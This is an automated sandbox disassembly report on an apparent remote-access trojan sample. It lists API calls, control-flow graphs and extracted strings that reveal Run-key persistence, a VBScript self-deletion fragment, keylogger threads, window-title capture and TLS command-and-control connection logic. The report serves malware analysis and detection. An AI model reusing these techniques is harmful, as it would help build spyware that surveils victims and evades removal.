                                              Function 000CBF04 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000D1699: TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                                • Part of subcall function 000D1699: WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,001342F8,?,pth_unenc), ref: 000CC013
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 000CC026
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,001342F8,?,pth_unenc), ref: 000CC056
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,001342F8,?,pth_unenc), ref: 000CC065
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C99A9,00000000,001342F8,pth_unenc,000CBF26,001342E0,001342F8,?,pth_unenc), ref: 000CAFC9
                                                • Part of subcall function 000CAFBA: UnhookWindowsHookEx.USER32(001340F8), ref: 000CAFD5
                                                • Part of subcall function 000CAFBA: TerminateThread.KERNEL32(000C9993,00000000,?,pth_unenc), ref: 000CAFE3
                                                • Part of subcall function 000DAB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00125900,000CC07B,.vbs,?,?,?,?,?,001342F8), ref: 000DAB5F
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000000), ref: 000CC280
                                              • ExitProcess.KERNEL32 ref: 000CC287
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                              • API String ID: 3797177996-3018399277
                                              • Opcode ID: c33d9704fe5caec1d56bd800b5314f1d4383b175764430e893d318a4c449f120
                                              • Instruction ID: f28a6a26a382755389db1cc14cd65636a28cc098d4100721f3ba2e2512e2ff36
                                              • Opcode Fuzzy Hash: c33d9704fe5caec1d56bd800b5314f1d4383b175764430e893d318a4c449f120
                                              • Instruction Fuzzy Hash: 3E815031604250ABD718FB20E852FFF77A9AF96700F50452DF486972D3EF70AE498652
                                              Function 000D3FD4 Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 813sleepnetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 586 d3fd4-d401f call c1faa call daa73 call c1faa call c1d64 call c1e8f call fa5e7 599 d402e-d407c call c1f66 call c1d64 call c1fbd call dafc3 call c4262 call c1d64 call cb125 586->599 600 d4021-d4028 Sleep 586->600 615 d407e-d40ed call c1d64 call c22f8 call c1d64 call c1e8f call c1d64 call c22f8 call c1d64 call c1e8f call c1d64 call c22f8 call c1d64 call c1e8f call c4101 599->615 616 d40f0-d418a call c1f66 call c1d64 call c1fbd call dafc3 call c1d64 * 2 call c85b4 call c27cb call c1eef call c1eea * 2 call c1d64 call c5422 599->616 600->599 615->616 669 d418c-d4198 616->669 670 d419a-d41a1 616->670 671 d41a6-d4242 call c541d call c4cbf call c5ce6 call c27cb call c1f66 call da686 call c1eea * 2 call c1d64 call c1e8f call c1d64 call c1e8f call d3f9a 669->671 670->671 698 d428f-d429d call c41f1 671->698 699 d4244-d428a WSAGetLastError call dbc76 call c4c9e call c1f66 call da686 call c1eea 671->699 704 d429f-d42c5 call c1f66 * 2 call da686 698->704 705 d42ca-d42df call c4915 call c428c 698->705 721 d4b54-d4b66 call c47eb call c20b4 699->721 704->721 720 d42e5-d4432 call c1d64 * 2 call c4cbf call c5ce6 call c27cb call c5ce6 call c27cb call c1f66 call da686 call c1eea * 4 call da96d call d3683 call c82dc call 100c51 call c1d64 call c1fbd call c22f8 call c1e8f * 2 call d265d 705->720 705->721 786 d4434-d4441 call c541d 720->786 787 d4446-d446d call c1e8f call d2513 720->787 735 d4b8e-d4b96 call c1d8c 721->735 736 d4b68-d4b88 call c1d64 call c1e8f call fa5e7 Sleep 721->736 735->616 736->735 786->787 793 d446f-d4471 787->793 794 d4474-d4abb call c3b40 call ccbf1 call dadee call daec8 call dad46 call c1d64 GetTickCount call dad46 call daca0 call dad46 * 2 call dac52 call daec8 * 5 call ce679 call daec8 call c27ec call c275c call c27cb call c275c call c27cb * 3 call c275c call c27cb call c5ce6 call c27cb call c5ce6 call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c275c call c27cb call c5ce6 call c27cb * 5 call c275c call c27cb call c275c call c27cb * 7 call c275c call c4468 call c1eea * 50 call c1e13 call c1eea * 6 call c1e13 call c45d5 787->794 793->794 1039 d4ac0-d4ac7 794->1039 1040 d4ac9-d4ad0 1039->1040 1041 d4adb-d4ae2 1039->1041 1040->1041 1042 d4ad2-d4ad4 1040->1042 1043 d4aee-d4b20 call c5415 call c1f66 * 2 call da686 1041->1043 1044 d4ae4-d4ae9 call ca767 1041->1044 1042->1041 1055 d4b34-d4b4f call c1eea * 2 call c1e13 1043->1055 1056 d4b22-d4b2e CreateThread 1043->1056 1044->1043 1055->721 1056->1055
                                              APIs
                                              • Sleep.KERNEL32(00000000,00000029,001342F8,?,00000000), ref: 000D4028
                                              • WSAGetLastError.WS2_32 ref: 000D4249
                                              • Sleep.KERNEL32(00000000,00000002), ref: 000D4B88
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$ErrorLastLocalTime
                                              • String ID: | $%I64u$5.3.0 Pro$C:\Users\user\Desktop\4wECQoBvYC.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                              • API String ID: 524882891-3658575850
                                              • Opcode ID: 3c9fb38d2d4b205a3c24b2ad019662ff63de89fd1f6fc1eca9f511e0848954d1
                                              • Instruction ID: a1e264683e5d64ae40c89fe2fa9273518b234e5f5cdb05ef21cd18609f7bdc22
                                              • Opcode Fuzzy Hash: 3c9fb38d2d4b205a3c24b2ad019662ff63de89fd1f6fc1eca9f511e0848954d1
                                              • Instruction Fuzzy Hash: B1522D32A041245BDB18F774DDA2FEE73759FA2700F5041AEF80AA6293EF305E85CA55
                                              Function 000C428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1063 c428c-c42ad connect 1064 c43e1-c43e5 1063->1064 1065 c42b3-c42b6 1063->1065 1068 c445f 1064->1068 1069 c43e7-c43f5 WSAGetLastError 1064->1069 1066 c42bc-c42bf 1065->1066 1067 c43da-c43dc 1065->1067 1071 c42eb-c42f5 call e0151 1066->1071 1072 c42c1-c42e8 call c4cbf call c1f66 call da686 1066->1072 1070 c4461-c4465 1067->1070 1068->1070 1069->1068 1073 c43f7-c43fa 1069->1073 1082 c4306-c4313 call e0373 1071->1082 1083 c42f7-c4301 1071->1083 1072->1071 1076 c43fc-c4437 call dbc76 call c4c9e call c1f66 call da686 call c1eea 1073->1076 1077 c4439-c443e 1073->1077 1076->1068 1079 c4443-c445c call c1f66 * 2 call da686 1077->1079 1079->1068 1096 c434c-c4357 call e0f34 1082->1096 1097 c4315-c4338 call c1f66 * 2 call da686 1082->1097 1083->1079 1109 c4389-c4396 call e02ea 1096->1109 1110 c4359-c4387 call c1f66 * 2 call da686 call e0592 1096->1110 1126 c433b-c4347 call e0191 1097->1126 1120 c43be-c43d7 CreateEventW * 2 1109->1120 1121 c4398-c43bb call c1f66 * 2 call da686 1109->1121 1110->1126 1120->1067 1121->1120 1126->1068
                                              APIs
                                              • connect.WS2_32(?,?,?), ref: 000C42A5
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,000C192B), ref: 000C43CB
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,000C192B), ref: 000C43D5
                                              • WSAGetLastError.WS2_32(?,?,?,000C192B), ref: 000C43E7
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                              • API String ID: 994465650-2151626615
                                              • Opcode ID: 48440025b215e024fbd830cb60954318bd8dba87294ace021d3ec86367cfbb6e
                                              • Instruction ID: 53b8b8394f2ee57093b1ee49f45f8e37657e8bcfaa6bd21a98b635f72476962f
                                              • Opcode Fuzzy Hash: 48440025b215e024fbd830cb60954318bd8dba87294ace021d3ec86367cfbb6e
                                              • Instruction Fuzzy Hash: 6B411A71B00651EBCB18B7798D6BFEDBA56BB82320780411DF40147A93EF61A96187E3
                                              Function 000CA3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1138 ca3f4-ca400 1139 ca402-ca406 1138->1139 1140 ca408-ca40c 1139->1140 1141 ca412-ca425 1139->1141 1140->1141 1142 ca608-ca610 1140->1142 1143 ca45c-ca482 Sleep GetForegroundWindow GetWindowTextLengthW call cb027 1141->1143 1144 ca427-ca439 call f3519 1141->1144 1147 ca487-ca489 1143->1147 1144->1143 1151 ca43b-ca45b call c1e52 call f38a5 call f34cf 1144->1151 1149 ca48f-ca4ba call c22f8 call c1e07 GetWindowTextW call cb131 1147->1149 1150 ca533-ca546 call cae58 call daca0 1147->1150 1149->1150 1175 ca4bc-ca4ef call caffa call c22f8 call c82a8 1149->1175 1165 ca54c 1150->1165 1166 ca5f1-ca5fa call c1e13 1150->1166 1151->1143 1170 ca550-ca554 1165->1170 1166->1139 1173 ca556-ca55a 1170->1173 1174 ca560-ca567 call daca0 1170->1174 1173->1174 1177 ca5ff-ca603 call c1e13 1173->1177 1183 ca57c-ca5ec call 100c51 call c1f66 call c4c9e call c5ce6 call dae08 call c9d58 call c1eea * 3 1174->1183 1184 ca569-ca57a Sleep 1174->1184 1192 ca4f1-ca500 call c82dc call ca876 1175->1192 1193 ca502-ca52e call cb0dd call c28cf call c9d58 call c1e13 1175->1193 1177->1142 1183->1166 1184->1170 1192->1150 1193->1150
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 000CA456
                                              • Sleep.KERNEL32(000001F4), ref: 000CA461
                                              • GetForegroundWindow.USER32 ref: 000CA467
                                              • GetWindowTextLengthW.USER32(00000000), ref: 000CA470
                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 000CA4A4
                                              • Sleep.KERNEL32(000003E8), ref: 000CA574
                                                • Part of subcall function 000C9D58: SetEvent.KERNEL32(?,?,00000000,000CA91C,00000000), ref: 000C9D84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                              • String ID: [${ User has been idle for $ minutes }$]
                                              • API String ID: 911427763-3954389425
                                              • Opcode ID: 5f4326d82fc5bb1d6fcbfcebf2f7735c4935d4491522b29a4d28620bb9830c53
                                              • Instruction ID: 4193bdf8575835751acc2cdf04f73fc0e249281d496006d74b7692921221ba05
                                              • Opcode Fuzzy Hash: 5f4326d82fc5bb1d6fcbfcebf2f7735c4935d4491522b29a4d28620bb9830c53
                                              • Instruction Fuzzy Hash: 5A51FE316086045BC718FB60D88AFEE77A6AF86714F50492DF846922D3DF709E85C693
                                              Function 000CC89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1218 cc89e-cc8c3 call c1e52 1221 cc9ed-cca13 call c1e07 GetLongPathNameW call c3b40 1218->1221 1222 cc8c9 1218->1222 1245 cca18-cca85 call c3b40 call ccc37 call c2860 * 2 call c1e13 * 5 1221->1245 1224 cc90f-cc916 call db15b 1222->1224 1225 cc9d8 1222->1225 1226 cc9c9-cc9ce call fac0f 1222->1226 1227 cc8da-cc8e8 call da74b call c1e18 1222->1227 1228 cc8fb-cc900 1222->1228 1229 cc9bb-cc9c0 1222->1229 1230 cc905-cc90a 1222->1230 1231 cc8d0-cc8d5 1222->1231 1232 cc9c2-cc9c7 1222->1232 1246 cc918-cc968 call c3b40 call fac0f call c3b40 call c2860 call c1e18 call c1e13 * 2 1224->1246 1247 cc96a-cc9b6 call c3b40 call fac0f call c3b40 call c2860 call c1e18 call c1e13 * 2 1224->1247 1233 cc9dd-cc9e2 call fac0f 1225->1233 1242 cc9d3-cc9d6 1226->1242 1249 cc8ed 1227->1249 1228->1233 1229->1233 1230->1233 1231->1233 1232->1233 1248 cc9e3-cc9e8 call c82d7 1233->1248 1242->1225 1242->1248 1254 cc8f1-cc8f6 call c1e13 1246->1254 1247->1249 1248->1221 1249->1254 1254->1221
                                              APIs
                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 000CCA04
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                              • API String ID: 82841172-425784914
                                              • Opcode ID: 579acc916bf2ef469999a57afbbc092fa2fc7f4d907aae7a99b0f13c1674d989
                                              • Instruction ID: 0bc7824df1f559b9ecf784df13fb9e22906f29cae6e5767281e5b03d9e18762c
                                              • Opcode Fuzzy Hash: 579acc916bf2ef469999a57afbbc092fa2fc7f4d907aae7a99b0f13c1674d989
                                              • Instruction Fuzzy Hash: A1414572108240ABD214FB20DC56EFFB7A4AF91710F50452EF586D20E3EF709E59C666
                                              Function 000DA463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1352 da463-da4b7 call db15b call d2513 call c1eef call c1eea call cb9f2 1363 da4b9-da4c8 call d2513 1352->1363 1364 da4fa-da51a call c4ddc 1352->1364 1368 da4cd-da4e4 call c1e8f StrToIntA 1363->1368 1371 da4e6-da4ef call dc102 1368->1371 1372 da4f2-da4f5 call c1eea 1368->1372 1371->1372 1372->1364
                                              APIs
                                                • Part of subcall function 000DB15B: GetCurrentProcess.KERNEL32(?,?,?,000CC914,WinDir,00000000,00000000), ref: 000DB16C
                                                • Part of subcall function 000D2513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 000D2537
                                                • Part of subcall function 000D2513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 000D2554
                                                • Part of subcall function 000D2513: RegCloseKey.KERNEL32(?), ref: 000D255F
                                              • StrToIntA.SHLWAPI(00000000,0012BC48,?,00000000,00000000,00134358,00000003,Exe,00000000,0000000E,00000000,0012556C,00000003,00000000), ref: 000DA4D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue
                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 1866151309-2070987746
                                              • Opcode ID: 90c44cc45187dfa59f23898bd29bbcfa7b3a246272e0eee146ab2579cb72aede
                                              • Instruction ID: 2cd61ece7b4630d228423509368b1598ab778f7e0c2ae85c5e624aee58e355e6
                                              • Opcode Fuzzy Hash: 90c44cc45187dfa59f23898bd29bbcfa7b3a246272e0eee146ab2579cb72aede
                                              • Instruction Fuzzy Hash: B311E960A042115AD705B3A4ECABEFF776A9BD1300F400529F412E32D3EB649E5683B1
                                              Function 000C9E48 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(00001388), ref: 000C9E62
                                                • Part of subcall function 000C9D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C9E6F), ref: 000C9DCD
                                                • Part of subcall function 000C9D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,000C9E6F), ref: 000C9DDC
                                                • Part of subcall function 000C9D97: Sleep.KERNEL32(00002710,?,?,?,000C9E6F), ref: 000C9E09
                                                • Part of subcall function 000C9D97: CloseHandle.KERNEL32(00000000,?,?,?,000C9E6F), ref: 000C9E10
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 000C9E9E
                                              • GetFileAttributesW.KERNEL32(00000000), ref: 000C9EAF
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 000C9EC6
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 000C9F40
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00125900,?,00000000,00000000,00000000,00000000,00000000), ref: 000CA049
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                              • String ID:
                                              • API String ID: 3795512280-0
                                              • Opcode ID: 843b0848390b23511e3da31986f39f0cb4fb9f2655f1519742dc3a399f883753
                                              • Instruction ID: 3bc78addb357198194b155a250a3373168907249aefa220a8a9257dbf435ca2f
                                              • Opcode Fuzzy Hash: 843b0848390b23511e3da31986f39f0cb4fb9f2655f1519742dc3a399f883753
                                              • Instruction Fuzzy Hash: 52517C316043049BCB18FB70D866FFF7BAAAF96300F00052DF992A72D3DF6599459692
                                              Function 000C4468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              • WaitForSingleObject.KERNEL32(?,00000000,LL,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000), ref: 000C450E
                                              • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000,?,?,?,?,?,000D4CE9), ref: 000C453C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EventObjectSingleWaitsend
                                              • String ID: LL
                                              • API String ID: 3963590051-2551907876
                                              • Opcode ID: be1224bb59da6756acac28a2fdd6f7af34fa8f74e87aee50b4132a7137808c40
                                              • Instruction ID: 14d1be99b9b8e63e9963acd20a1ff2a010fa39b692afe88b204e6b4ed7652eb5
                                              • Opcode Fuzzy Hash: be1224bb59da6756acac28a2fdd6f7af34fa8f74e87aee50b4132a7137808c40
                                              • Instruction Fuzzy Hash: 2F213272900529BBDF05ABA4DC96EEE777CFF14350B00412DF916A2593EE34A914C6A0
                                              Function 000C98A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1557 c98a5-c98cc call caffa 1560 c98ce-c98f1 call c1f66 call dae08 call ca876 call c1eea 1557->1560 1561 c98f6-c992e call c1f66 * 2 call da686 CreateThread 1557->1561 1560->1561 1575 c993c-c994b CreateThread call c1e13 1561->1575 1576 c9930-c993a CreateThread 1561->1576 1578 c9950-c9956 1575->1578 1576->1575
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,000C99A9,?,00000000,00000000), ref: 000C992A
                                              • CreateThread.KERNEL32(00000000,00000000,000C9993,?,00000000,00000000), ref: 000C993A
                                              • CreateThread.KERNEL32(00000000,00000000,000C99B5,?,00000000,00000000), ref: 000C9946
                                                • Part of subcall function 000CA876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                                • Part of subcall function 000CA876: wsprintfW.USER32 ref: 000CA905
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTimewsprintf
                                              • String ID: Offline Keylogger Started
                                              • API String ID: 465354869-4114347211
                                              • Opcode ID: 2b342cbcfcb24cab8426aa456ee954300db456fbaaf54a26f0bd83f997db7510
                                              • Instruction ID: f4e1b73890b7eaf9e00e6130818b236937091422306afda15f95c78e96864da0
                                              • Opcode Fuzzy Hash: 2b342cbcfcb24cab8426aa456ee954300db456fbaaf54a26f0bd83f997db7510
                                              • Instruction Fuzzy Hash: 7911E7B12002087ED320BB299C8BDEF7A5DDB823A4B40052DF84516583EE705E15C6F3
                                              Function 000C4915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(00000001,00133EE8,001345A8,00000000,?,?,?,?,?,000D4D8A,?,00000001), ref: 000C4946
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00133EE8,001345A8,00000000,?,?,?,?,?,000D4D8A,?,00000001), ref: 000C4994
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 000C49A7
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 000C495C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$EventLocalThreadTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 2532271599-1507639952
                                              • Opcode ID: 073b831aec8dcc6776424dde1b1f2d32e0b213a431bb7f68ba1588f170fb7489
                                              • Instruction ID: e035e8a1542617b1889b6aea217ce18db4a8701ca5f475900b3e2e2bb233c95b
                                              • Opcode Fuzzy Hash: 073b831aec8dcc6776424dde1b1f2d32e0b213a431bb7f68ba1588f170fb7489
                                              • Instruction Fuzzy Hash: D411C1319042A47ACB20AB7A9C59FDFBFACEB17364F44401EF40552682D7749485CBF2
                                              Function 000D26D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 000D26E1
                                              • RegSetValueExA.KERNEL32(?,00126748,00000000,?,00000000,00000000,001342F8,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2709
                                              • RegCloseKey.KERNEL32(?,?,?,000CE5FB,00126748,5.3.0 Pro), ref: 000D2714
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: 3123c3717bcf6a035aaf4456f0341037c05da08033008b850e4214814e942957
                                              • Instruction ID: f0ac7a6093cc17acfab3458bcf3d3680477709accfa0b5d51c4a3372c19c34bd
                                              • Opcode Fuzzy Hash: 3123c3717bcf6a035aaf4456f0341037c05da08033008b850e4214814e942957
                                              • Instruction Fuzzy Hash: DBF09072144214FBDB159FA0DD15EEE377CEF15740F108119F902A6291EA319E04DA60
                                              Function 000CAFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • TerminateThread.KERNEL32(000C99A9,00000000,001342F8,pth_unenc,000CBF26,001342E0,001342F8,?,pth_unenc), ref: 000CAFC9
                                              • UnhookWindowsHookEx.USER32(001340F8), ref: 000CAFD5
                                              • TerminateThread.KERNEL32(000C9993,00000000,?,pth_unenc), ref: 000CAFE3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: TerminateThread$HookUnhookWindows
                                              • String ID: pth_unenc
                                              • API String ID: 3123878439-4028850238
                                              • Opcode ID: 916641fd7532f0d3116ee18d1b690ce9f6e85b75cacfd61859cf8f84b48c1706
                                              • Instruction ID: dc67f836095bdf10f8b75143978ea55acaec318ad233427a525f443d36c60047
                                              • Opcode Fuzzy Hash: 916641fd7532f0d3116ee18d1b690ce9f6e85b75cacfd61859cf8f84b48c1706
                                              • Instruction Fuzzy Hash: AAE01271319216EFD3241FD49C88DADBBFAEB45389314443DF7C286660C6714C85DB51
                                              Function 000C4688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 000C4778
                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 000C478C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 000C4797
                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 000C47A0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 3360349984-0
                                              • Opcode ID: 6e998e6cc421ccc566f532968a36ab8f0e78c020dfa3688fd1a9ef690cab0db5
                                              • Instruction ID: 3af5919e419a8c2e509b32904f2214cb310e2fe46f9456399d40c17f8ff54fed
                                              • Opcode Fuzzy Hash: 6e998e6cc421ccc566f532968a36ab8f0e78c020dfa3688fd1a9ef690cab0db5
                                              • Instruction Fuzzy Hash: C1418F71608340ABC714EB64CD65FFFB7E9AF96310F004A1DF89282293EB3499098762
                                              Function 000DB58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00125900,00000000,00000000,000CC267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 000DB5CE
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DB5EB
                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000DB5FF
                                              • CloseHandle.KERNEL32(00000000), ref: 000DB60C
